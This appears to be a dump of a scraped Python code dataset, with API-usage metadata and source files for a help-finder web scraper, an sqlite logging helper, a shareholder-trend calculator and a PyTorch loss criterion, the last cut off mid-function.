{"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 170, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 170, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 171, "usage_type": "name"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 177, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 177, "usage_type": "name"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 182, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 208, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 210, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 210, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 212, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 214, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 214, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 215, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 217, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 218, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 219, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 220, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 220, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 224, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 224, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 225, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 225, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 226, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 226, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 227, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 233, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 233, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 234, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 235, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 236, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 236, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 237, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 237, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 250, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 250, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 263, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 266, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 266, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 272, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 273, "usage_type": "call"}, {"api_name": "sklearn.tree.export_graphviz", "line_number": 276, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 276, "usage_type": "name"}, {"api_name": "graphviz.Source", "line_number": 279, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 289, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 289, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 293, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 293, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 294, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 295, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 295, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 296, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 296, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 297, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 297, "usage_type": "name"}, {"api_name": "sklearn.metrics.make_scorer", "line_number": 302, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 302, "usage_type": "argument"}, {"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 305, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 305, "usage_type": "name"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 309, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 310, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 318, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 333, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 333, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 334, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 334, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 335, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 336, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 336, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 337, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 337, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 339, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 339, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 340, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 341, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 341, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 342, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 342, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 344, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 344, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 345, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 345, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 346, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 346, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 347, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 347, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 350, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 350, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 351, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 351, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 352, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 352, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 353, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 353, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 354, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 354, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 355, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 355, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 360, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 360, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 361, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 362, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 363, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 363, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 364, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 364, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 381, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 381, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 396, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 399, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 399, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 405, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 405, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 411, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 411, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 416, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 417, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 425, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 427, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 427, "usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 428, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 428, "usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 429, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 429, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 442, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 443, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 444, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 457, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 457, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 458, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 458, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 459, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 460, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 461, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 462, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 462, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 464, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 464, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 465, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 466, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 467, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 468, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 468, "usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 478, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 478, "usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 479, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 479, "usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 480, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 480, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 482, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 482, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 483, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 483, "usage_type": "name"}, {"api_name": "seaborn.barplot", "line_number": 484, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 484, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 487, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 487, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 488, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 488, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 490, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 490, "usage_type": "name"}, {"api_name": "seaborn.barplot", "line_number": 491, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 491, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 494, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 494, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 495, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 495, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 497, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 497, "usage_type": "name"}, {"api_name": "seaborn.barplot", "line_number": 498, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 498, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 501, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 501, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 552, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 555, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 555, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 561, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 562, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 562, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 569, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 571, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 571, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 572, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 572, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 573, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 573, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 574, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 574, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 577, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 578, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 579, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 580, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 585, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 589, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 589, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 590, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 591, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 592, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 593, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 594, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 594, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 595, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 595, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 598, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 598, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 599, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 599, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 600, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 600, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 601, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 601, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 603, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 603, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 604, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 604, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 605, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 605, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 606, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 606, "usage_type": "call"}]} +{"seq_id": "113071957", "text": "from mechanize import Browser\ndef ma_dv_hotline(cityName):\n br = Browser() \n br.set_handle_robots(False) # ignore robots\n br.set_handle_refresh(False) # can sometimes hang without this\n br.addheaders = [('User-agent', 'Firefox')] \t \n br.open(\"https://findhelp.janedoe.org/find_help/search\") \n br.select_form(id=\"searchprograms\") \n br[\"city\"] = [cityName] \n response = br.submit() \n cleanResponse = response.read().decode(\"utf-8\") #get rid of bytes-type error and white space\n cleanResponse = cleanResponse.replace('','')\n return cleanResponse\n\n#parse the output with HTMLParser\nfrom html.parser import HTMLParser\nclass HTMLFilter(HTMLParser):\n def __init__(self):\n HTMLParser.__init__(self)\n self.recording = 0\n self.text = \"\"\n self.data = []\n\n def handle_starttag(self, tag, attributes):\n if tag != 'div':\n return\n if self.recording:\n self.recording += 1\n return\n for name, value in attributes:\n if name == 'class' and value == 'article':\n break\n else:\n return\n self.recording = 1\n\n def handle_endtag(self, tag):\n if tag == 'div' and self.recording:\n self.recording -= 1\n\n def handle_data(self, data): \n if self.recording: \n self.text += data ", "sub_path": "docassemble/DVhotline/dv_hotline.py", "file_name": "dv_hotline.py", "file_ext": "py", "file_size_in_byte": 1278, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "mechanize.Browser", "line_number": 3, "usage_type": "call"}, {"api_name": "html.parser.HTMLParser", "line_number": 17, "usage_type": "name"}, {"api_name": "html.parser.HTMLParser.__init__", "line_number": 19, "usage_type": "call"}, {"api_name": "html.parser.HTMLParser", "line_number": 19, "usage_type": "name"}]} +{"seq_id": "578880752", "text": "import glob\nimport os\nimport sqlite3\nimport datetime\n\n\ndb_loc = '/data6/bio/TFM/asshole/db.sqlite3'\n\ndef save_to_db(task_id, rule_name, in_list, out_list, status ):\n \n save_str_wc = \"INSERT INTO explorer_snakeruleresult VALUES (null, '{date_time}', '{task_id}', '{rule_name}', '{in_list}','{out_list}', '{status}');\"\n save_str = save_str_wc.format(date_time=datetime.datetime.now(),\ntask_id=task_id, rule_name=rule_name, in_list=in_list, out_list=out_list, status=status)\n \n print(save_str)\n \n conn = sqlite3.connect(db_loc)\n c = conn.cursor()\n c.execute(save_str)\n conn.commit()\n conn.close()", "sub_path": "bin/templates/head.py", "file_name": "head.py", "file_ext": "py", "file_size_in_byte": 626, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "datetime.datetime.now", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "546632847", "text": "from __future__ import division\n\nimport os\nimport sys\nfrom datetime import datetime\n\nimport mongoengine\nsys.path.append(os.path.abspath(os.path.join('..', '..', '..')))\nfrom iquant.mongodb.models import ShareHolders\nfrom iquant.mongodb.models import ShareHoldersBrief\n\n\n\n\ndef get_data():\n data = {}\n for sample in ShareHolders.objects().order_by('-datetime'):\n if not data.has_key(sample.code):\n data[sample.code] = []\n data[sample.code].append({'datetime': sample.datetime,\n 'holder_num': sample.holder_num,\n 'holder_avgnum_tradable': sample.holder_avgnum_tradable})\n return data\n\n\ndef share_holder_calculate(data, period, updatetime):\n print(\"Calculating for period \" + str(period))\n for code, share_holder_data in data.iteritems():\n if len(share_holder_data) >= (period + 4):\n is_valid = True\n for i in range(0, 4):\n if share_holder_data[period + i]['holder_num'] < 1000 or \\\n share_holder_data[period + i]['holder_avgnum_tradable'] < 1000:\n is_valid = False\n break\n if is_valid:\n segment_data = share_holder_data[0: period]\n max_holder_num_index = get_max_holder_num_index(segment_data)\n if max_holder_num_index != -1:\n max_holder_num = segment_data[max_holder_num_index]['holder_num']\n latest_holder_num = segment_data[0]['holder_num']\n ratio = float((max_holder_num - latest_holder_num) / max_holder_num)\n store_to_db(updatetime,\n code,\n get_name_by_code(code),\n period,\n ratio,\n segment_data[max_holder_num_index]['datetime'])\n\n\ndef get_max_holder_num_index(share_holder_data):\n max_holder_num = 0\n index = 0\n for sample in share_holder_data:\n if sample['holder_num'] < 1000 or sample['holder_avgnum_tradable'] < 1000:\n return -1\n if sample['holder_num'] > max_holder_num:\n max_holder_num = sample['holder_num']\n max_holder_num_index = index\n index += 1\n return max_holder_num_index\n\n\ndef get_name_by_code(code):\n return ShareHolders.objects(code=code).first().name\n\n\ndef store_to_db(updatetime, code, name, period, ratio, max_datetime):\n sample = ShareHoldersBrief.objects(code=code, period=period)\n if sample:\n sample.update(updatetime=updatetime,\n ratio=ratio,\n max_datetime=max_datetime)\n else:\n ShareHoldersBrief(updatetime=updatetime,\n code=code,\n name=name,\n period=period,\n ratio=ratio,\n max_datetime=max_datetime).save()\n\n\nif __name__ == '__main__':\n mongoengine.connect('stock', host='127.0.0.1', port=27017)\n data = get_data()\n updatetime = datetime.now()\n for period in range(2, 21):\n share_holder_calculate(data, period, updatetime)\n", "sub_path": "iquant/datahandler/data_analysis/shareholders_trend.py", "file_name": "shareholders_trend.py", "file_ext": "py", "file_size_in_byte": 3237, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "sys.path.append", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "iquant.mongodb.models.ShareHolders.objects", "line_number": 17, "usage_type": "call"}, {"api_name": "iquant.mongodb.models.ShareHolders", "line_number": 17, "usage_type": "name"}, {"api_name": "iquant.mongodb.models.ShareHolders.objects", "line_number": 65, "usage_type": "call"}, {"api_name": "iquant.mongodb.models.ShareHolders", "line_number": 65, "usage_type": "name"}, {"api_name": "iquant.mongodb.models.ShareHoldersBrief.objects", "line_number": 69, "usage_type": "call"}, {"api_name": "iquant.mongodb.models.ShareHoldersBrief", "line_number": 69, "usage_type": "name"}, {"api_name": "iquant.mongodb.models.ShareHoldersBrief", "line_number": 75, "usage_type": "call"}, {"api_name": "mongoengine.connect", "line_number": 84, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 86, "usage_type": "name"}]} +{"seq_id": "225775824", "text": "# Copyright (c) Facebook, Inc. and its affiliates.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\nimport torch\nimport torch.nn.functional as F\n\nfrom loggings import metrics\nfrom tools import utils\nfrom criterions import register_criterion\nfrom loggings.meters import safe_round\nfrom .cross_entropy import CrossEntropyCriterion\n\n@register_criterion('cross_entropy_uer')\nclass CrossEntropyUerCriterion(CrossEntropyCriterion):\n\n def forward(self, model, sample, reduce=True):\n \"\"\"Compute the loss for the given sample.\n\n Returns a tuple with three elements:\n 1) the loss\n 2) the sample size, which is used as the denominator for the gradient\n 3) logging outputs to display while training\n \"\"\"\n net_output = model(**sample['net_input'])\n sample_size = sample['ntokens']\n loss, losses = self.compute_loss(net_output, sample)\n\n logging_output = {\n 'loss': loss.data,\n 'ntokens': sample['ntokens'],\n 'nsentences': sample['target'].size(0),\n 'sample_size': sample_size,\n }\n\n if 'ce_loss' in losses:\n logging_output['ce_loss'] = losses['ce_loss']\n\n if 'qua_loss' in losses:\n logging_output['qua_loss'] = losses['qua_loss']\n\n # if not model.training:\n # import editdistance\n #\n # with torch.no_grad():\n # probs = F.softmax(logits, dim=-1).float().cpu()\n #\n # c_err = 0\n # c_len = 0\n # for p, t, inp_l in zip(\n # probs,\n # sample[\"target\"],\n # input_lengths,\n # ):\n # p = p[:inp_l].unsqueeze(0)\n #\n # p = (t != self.task.target_dictionary.pad()) & (\n # t != self.task.target_dictionary.eos()\n # )\n # targ = t[p]\n # targ_units_arr = targ.tolist()\n #\n # toks = p.argmax(dim=-1).unique_consecutive()\n # pred_units_arr = toks.tolist()\n #\n # c_err += editdistance.eval(pred_units_arr, targ_units_arr)\n # c_len += len(targ_units_arr)\n #\n # logging_output[\"c_errors\"] = c_err\n # logging_output[\"c_total\"] = c_len\n\n return loss, sample_size, logging_output\n\n def compute_loss(self, net_output, sample):\n logits = net_output['logits']\n target = sample['target']\n target_lengths = sample['target_lengths']\n target_paddings = 1 - utils.sequence_mask(target_lengths)\n losses = {}\n loss = ce_loss = cal_ce_loss(logits, target, target_paddings)\n losses['ce_loss'] = ce_loss\n\n if 'num_output' in net_output:\n _number = net_output['num_output']\n number = target_lengths.float()\n qua_loss = torch.sqrt(torch.pow(_number - number, 2)).sum()\n losses['qua_loss'] = qua_loss\n loss = loss + qua_loss * 0.01\n\n return loss, losses\n\n @staticmethod\n def reduce_metrics(logging_outputs) -> None:\n \"\"\"Aggregate logging outputs from data parallel training.\"\"\"\n loss_sum = sum(log.get('loss', 0) for log in logging_outputs)\n ntokens = sum(log.get('ntokens', 0) for log in logging_outputs)\n nsentences = sum(log.get('nsentences', 0) for log in logging_outputs)\n sample_size = sum(log.get('sample_size', 0) for log in logging_outputs)\n\n metrics.log_scalar('loss', loss_sum / sample_size, sample_size, round=3)\n\n if 'ce_loss' in logging_outputs[0]:\n ce_loss = sum(log['ce_loss'] for log in logging_outputs) / ntokens\n metrics.log_scalar('ce_loss', ce_loss, ntokens, round=3)\n if 'qua_loss' in logging_outputs[0]:\n qua_loss = sum(log['qua_loss'] for log in logging_outputs) / nsentences\n metrics.log_scalar('qua_loss', qua_loss, nsentences, round=3)\n\n c_errors = sum(log.get(\"c_errors\", 0) for log in logging_outputs)\n metrics.log_scalar(\"_c_errors\", c_errors)\n c_total = sum(log.get(\"c_total\", 0) for log in logging_outputs)\n metrics.log_scalar(\"_c_total\", c_total)\n\n if c_total > 0:\n metrics.log_derived(\n \"uer\",\n lambda meters: safe_round(meters[\"_c_errors\"].sum * 100.0 / meters[\"_c_total\"].sum, 3)\n if meters[\"_c_total\"].sum > 0\n else float(\"nan\"),\n )\n\n\ndef cal_ce_loss(logits, target_labels, target_paddings, label_smooth=0.0):\n losses = _compute_cross_entropy_losses(logits, target_labels.long(), target_paddings)\n loss = losses.sum()\n if label_smooth > 0:\n loss = loss * (1-label_smooth) + _uniform_label_smooth(logits, target_paddings)*label_smooth\n\n return loss\n\n\ndef _uniform_label_smooth(logits, paddings):\n log_probs = F.log_softmax(logits, dim=-1)\n nlabel = log_probs.shape[-1]\n ent_uniform = -torch.sum(log_probs, dim=-1)/nlabel\n\n return torch.sum(ent_uniform*(1-paddings).float())\n\n\ndef 